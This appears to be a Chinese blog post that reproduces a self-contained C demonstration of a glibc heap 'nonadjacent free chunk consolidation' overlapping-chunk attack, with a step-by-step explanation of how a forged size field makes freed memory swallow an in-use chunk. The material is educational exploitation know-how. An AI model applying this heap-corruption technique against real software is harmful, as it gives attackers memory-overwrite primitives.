源代码
1 /* 2 Yet another simple tale of overlapping chunk. 3 4 This technique is taken from 5 https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf. 6 7 This is also referenced as Nonadjacent Free Chunk Consolidation Attack. 8 9 */ 10 11 #include <stdio.h> 12 #include <stdlib.h> 13 #include <string.h> 14 #include <stdint.h> 15 #include <malloc.h> 16 17 int main(){ 18 19 intptr_t *p1,*p2,*p3,*p4,*p5,*p6; 20 unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6; 21 int prev_in_use = 0x1; 22 23 fprintf(stderr, "\nThis is a simple chunks overlapping problem"); 24 fprintf(stderr, "\nThis is also referenced as Nonadjacent Free Chunk Consolidation Attack\n"); 25 fprintf(stderr, "\nLet's start to allocate 5 chunks on the heap:"); 26 27 p1 = malloc(1000); 28 p2 = malloc(1000); 29 p3 = malloc(1000); 30 p4 = malloc(1000); 31 p5 = malloc(1000); 32 33 real_size_p1 = malloc_usable_size(p1); 34 real_size_p2 = malloc_usable_size(p2); 35 real_size_p3 = malloc_usable_size(p3); 36 real_size_p4 = malloc_usable_size(p4); 37 real_size_p5 = malloc_usable_size(p5); 38 39 fprintf(stderr, "\n\nchunk p1 from %p to %p", p1, (unsigned char *)p1+malloc_usable_size(p1)); 40 fprintf(stderr, "\nchunk p2 from %p to %p", p2, (unsigned char *)p2+malloc_usable_size(p2)); 41 fprintf(stderr, "\nchunk p3 from %p to %p", p3, (unsigned char *)p3+malloc_usable_size(p3)); 42 fprintf(stderr, "\nchunk p4 from %p to %p", p4, (unsigned char *)p4+malloc_usable_size(p4)); 43 fprintf(stderr, "\nchunk p5 from %p to %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5)); 44 45 memset(p1,'A',real_size_p1); 46 memset(p2,'B',real_size_p2); 47 memset(p3,'C',real_size_p3); 48 memset(p4,'D',real_size_p4); 49 memset(p5,'E',real_size_p5); 50 51 fprintf(stderr, "\nLet's free the chunk p4.\nIn this case this isn't coealesced with top chunk since we have p5 bordering top chunk after p4\n"); 52 53 free(p4); 54 55 fprintf(stderr, "\nLet's trigger the vulnerability on chunk p1 that overwrites the size of the in use chunk p2\nwith the size of chunk_p2 + size of chunk_p3\n"); 56 57 *(unsigned int *)((unsigned char *)p1 + real_size_p1 ) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; //<--- BUG HERE 58 59 fprintf(stderr, "\nNow during the free() operation on p2, the allocator is fooled to think that \nthe nextchunk is p4 ( since p2 + size_p2 now point to p4 ) \n"); 60 fprintf(stderr, "\nThis operation will basically create a big free chunk that wrongly includes p3\n"); 61 free(p2); 62 63 fprintf(stderr, "\nNow let's allocate a new chunk with a size that can be satisfied by the previously freed chunk\n"); 64 65 p6 = malloc(2000); 66 real_size_p6 = malloc_usable_size(p6); 67 68 fprintf(stderr, "\nOur malloc() has been satisfied by our crafted big free chunk, now p6 and p3 are overlapping and \nwe can overwrite data in p3 by writing on chunk p6\n"); 69 fprintf(stderr, "\nchunk p6 from %p to %p", p6, (unsigned char *)p6+real_size_p6); 70 fprintf(stderr, "\nchunk p3 from %p to %p\n", p3, (unsigned char *) p3+real_size_p3); 71 72 fprintf(stderr, "\nData inside chunk p3: \n\n"); 73 fprintf(stderr, "%s\n",(char *)p3); 74 75 fprintf(stderr, "\nLet's write something inside p6\n"); 76 memset(p6,'F',1500); 77 78 fprintf(stderr, "\nData inside chunk p3: \n\n"); 79 fprintf(stderr, "%s\n",(char *)p3); 80 81 82 }
运行结果
首先申请5个1000字节的堆p1,p2,p3,p4,p5
将5个堆都赋值上A,B,C,D,E以区分
这里因为字节对齐,又造成了每个堆使用了下个堆的prev_size字段
接着释放p4,由于后面有p5,所以不担心和top chunk合并
然后修改p2的size=1000+1000+0x10+1
现在&p2+p2->size=&p4
libc判断p2的下一个堆块为p4,忽略了p3
l将误以为原来的p2+p3这一段内存为一个新的堆p2(这里没有注意到p4的prev_size字段)
然后将p2释放
由于p4处于释放状态,所以p4和p2合并
p3被覆盖在新合并的堆中
申请一个2000字节的堆p6,即使用这个新合并的堆
p3被包含在p6中,又造成了overlapping
修改p6内容即可修改p3内容
与之前的overlapping相比
之前的是释放后修改size,重新申请后覆盖了后面的堆
这个是先修改size,使之大小覆盖了后面的堆,再释放后和已释放的后后个堆合并,包含了要覆盖的堆
重新申请后即可覆盖包含的堆的内容
416
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
